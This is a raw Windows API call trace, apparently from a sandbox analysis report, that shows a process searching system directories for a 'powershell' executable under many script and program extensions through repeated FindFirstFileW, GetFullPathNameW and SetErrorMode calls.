	[0640.575] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0640.583] SetErrorMode (uMode=0x1) returned 0x1
	[0640.585] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0640.585] SetErrorMode (uMode=0x1) returned 0x1
	[0640.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0643.589] SetErrorMode (uMode=0x1) returned 0x1
	[0643.590] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0643.590] SetErrorMode (uMode=0x1) returned 0x1
	[0643.591] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0643.599] SetErrorMode (uMode=0x1) returned 0x1
	[0643.600] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0643.600] SetErrorMode (uMode=0x1) returned 0x1
	[0643.601] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0643.609] SetErrorMode (uMode=0x1) returned 0x1
	[0643.611] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0643.611] SetErrorMode (uMode=0x1) returned 0x1
	[0643.611] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0645.946] SetErrorMode (uMode=0x1) returned 0x1
	[0645.947] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0645.947] SetErrorMode (uMode=0x1) returned 0x1
	[0645.947] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0645.955] SetErrorMode (uMode=0x1) returned 0x1
	[0645.957] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0645.957] SetErrorMode (uMode=0x1) returned 0x1
	[0645.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0645.965] SetErrorMode (uMode=0x1) returned 0x1
	[0645.967] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0645.967] SetErrorMode (uMode=0x1) returned 0x1
	[0645.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0645.975] SetErrorMode (uMode=0x1) returned 0x1
	[0645.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0645.977] SetErrorMode (uMode=0x1) returned 0x1
	[0645.977] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0645.977] SetErrorMode (uMode=0x1) returned 0x1
	[0648.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.184] SetErrorMode (uMode=0x1) returned 0x1
	[0648.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.184] SetErrorMode (uMode=0x1) returned 0x1
	[0648.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.185] SetErrorMode (uMode=0x1) returned 0x1
	[0648.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.185] SetErrorMode (uMode=0x1) returned 0x1
	[0648.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.185] SetErrorMode (uMode=0x1) returned 0x1
	[0648.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.186] SetErrorMode (uMode=0x1) returned 0x1
	[0648.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.186] SetErrorMode (uMode=0x1) returned 0x1
	[0648.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.187] SetErrorMode (uMode=0x1) returned 0x1
	[0648.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.187] SetErrorMode (uMode=0x1) returned 0x1
	[0648.187] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.187] SetErrorMode (uMode=0x1) returned 0x1
	[0648.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.188] SetErrorMode (uMode=0x1) returned 0x1
	[0648.188] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.188] SetErrorMode (uMode=0x1) returned 0x1
	[0648.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.188] SetErrorMode (uMode=0x1) returned 0x1
	[0648.188] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.188] SetErrorMode (uMode=0x1) returned 0x1
	[0648.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.189] SetErrorMode (uMode=0x1) returned 0x1
	[0648.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.189] SetErrorMode (uMode=0x1) returned 0x1
	[0648.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.189] SetErrorMode (uMode=0x1) returned 0x1
	[0648.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.190] SetErrorMode (uMode=0x1) returned 0x1
	[0648.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.190] SetErrorMode (uMode=0x1) returned 0x1
	[0648.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.191] SetErrorMode (uMode=0x1) returned 0x1
	[0648.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.191] SetErrorMode (uMode=0x1) returned 0x1
	[0648.191] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.191] SetErrorMode (uMode=0x1) returned 0x1
	[0648.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.192] SetErrorMode (uMode=0x1) returned 0x1
	[0648.192] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.192] SetErrorMode (uMode=0x1) returned 0x1
	[0648.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.192] SetErrorMode (uMode=0x1) returned 0x1
	[0648.192] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.193] SetErrorMode (uMode=0x1) returned 0x1
	[0648.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0648.193] SetErrorMode (uMode=0x1) returned 0x1
	[0648.193] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.193] SetErrorMode (uMode=0x1) returned 0x1
	[0648.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.194] SetErrorMode (uMode=0x1) returned 0x1
	[0648.194] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.194] SetErrorMode (uMode=0x1) returned 0x1
	[0648.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.194] SetErrorMode (uMode=0x1) returned 0x1
	[0648.195] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.195] SetErrorMode (uMode=0x1) returned 0x1
	[0648.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.195] SetErrorMode (uMode=0x1) returned 0x1
	[0648.195] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.195] SetErrorMode (uMode=0x1) returned 0x1
	[0648.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.196] SetErrorMode (uMode=0x1) returned 0x1
	[0648.196] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.196] SetErrorMode (uMode=0x1) returned 0x1
	[0648.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.197] SetErrorMode (uMode=0x1) returned 0x1
	[0648.197] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.197] SetErrorMode (uMode=0x1) returned 0x1
	[0648.197] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.197] SetErrorMode (uMode=0x1) returned 0x1
	[0648.197] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.198] SetErrorMode (uMode=0x1) returned 0x1
	[0648.198] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.198] SetErrorMode (uMode=0x1) returned 0x1
	[0648.198] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.198] SetErrorMode (uMode=0x1) returned 0x1
